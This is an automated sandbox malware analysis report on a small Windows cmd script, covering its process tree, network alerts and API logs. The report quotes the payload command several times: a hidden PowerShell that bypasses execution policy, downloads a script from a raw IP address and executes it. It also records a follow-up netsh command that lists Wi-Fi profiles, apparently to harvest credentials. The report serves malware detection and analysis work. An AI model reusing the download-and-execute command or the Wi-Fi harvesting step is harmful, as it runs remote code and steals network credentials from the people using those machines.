Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Dec. 6, 2023, 12:09 p.m.	Dec. 6, 2023, 12:30 p.m.

Size	143.0B
Type	ASCII text
MD5	`2977c8c94af8bc95f2c71f6b1b1f2633`
SHA256	`6ef821710b7a906ea2494d570b310e73feb71eacd91b73b6d8e77c21e5fd4c9f`
CRC32	`8F4BD859`
ssdeep	`3:VSJJLNyLmszQqPJH0cVEROg54etmAcLhzAK5DmZSQLKaKd4fP:snyLmszQO0cXg58zD5CtfP`
Yara	Antivirus - Contains references to security software

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "SBSxqHN" C:\Users\test22\AppData\Local\Temp\you.cmd
1932
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\you.cmd
  2056
  - powershell.exe powershell.exe -noexit -window hidden -ExecutionPolicy Bypass "IEX (New-Object Net.WebClient).DownloadString('http://3.75.162.63/ducky.ps1');"
    2144
    - netsh.exe "C:\Windows\system32\netsh.exe" wlan show profiles
      2332

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
3.75.162.63	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49167 -> 3.75.162.63:80	2032162	ET INFO PS1 Powershell File Request	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (9 events)

Time & API	Arguments	Status	Return
GetComputerNameW Dec. 6, 2023, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 6, 2023, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 6, 2023, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 6, 2023, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Dec. 6, 2023, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 6, 2023, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 6, 2023, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 6, 2023, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 6, 2023, 12:09 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Dec. 6, 2023, 12:09 p.m.			0	0

Command line console output was observed (9 events)

Time & API	Arguments	Status	Return
WriteConsoleW Dec. 6, 2023, 12:09 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 6, 2023, 12:09 p.m.	buffer: powershell.exe console_handle: 0x00000007	1	1
WriteConsoleW Dec. 6, 2023, 12:09 p.m.	buffer: -noexit -window hidden -ExecutionPolicy Bypass "IEX (New-Object Net.WebClient).DownloadString('http://3.75.162.63/ducky.ps1');" console_handle: 0x00000007	1	1
WriteConsoleW Dec. 6, 2023, 12:09 p.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x00000023	1	1
WriteConsoleW Dec. 6, 2023, 12:09 p.m.	buffer: At line:75 char:69 console_handle: 0x0000002f	1	1
WriteConsoleW Dec. 6, 2023, 12:09 p.m.	buffer: + $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim <<<< () console_handle: 0x0000003b	1	1
WriteConsoleW Dec. 6, 2023, 12:09 p.m.	buffer: + CategoryInfo : InvalidOperation: (Trim:String) [], RuntimeExcep console_handle: 0x00000047	1	1
WriteConsoleW Dec. 6, 2023, 12:09 p.m.	buffer: tion console_handle: 0x00000053	1	1
WriteConsoleW Dec. 6, 2023, 12:09 p.m.	buffer: + FullyQualifiedErrorId : InvokeMethodOnNull console_handle: 0x0000005f	1	1

Uses Windows APIs to generate a cryptographic key (48 events)

Time & API	Arguments	Status	Return
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c1d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029bb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029bb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029bb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029bb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029bb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029bb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c898 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c898 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c898 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c898 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c898 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c898 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c898 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c898 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c898 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c898 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c6d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029c6d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04e8e558 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04e8e558 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04e8e558 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04e8e558 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04e8e558 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04e8e558 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04e8e558 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 6, 2023, 12:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04e8e558 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Dec. 6, 2023, 12:09 p.m.		1	1	0

Powershell script has download & invoke calls (1 event)

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://3.75.162.63/ducky.ps1

Performs some HTTP requests (1 event)

request

GET http://3.75.162.63/ducky.ps1

Allocates read-write-execute memory (usually to unpack itself) (50 out of 167 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02600000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0245a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02452000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0258a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02597000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0245b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02582000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02595000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0258c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02830000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02583000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02584000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02585000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02586000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02587000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02588000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02589000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 6, 2023, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

powershell.exe -noexit -window hidden -ExecutionPolicy Bypass "IEX (New-Object Net.WebClient).DownloadString('http://3.75.162.63/ducky.ps1');"

Executes one or more WMI queries (1 event)

wmi	select * from Win32_NetworkAdapterConfiguration

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
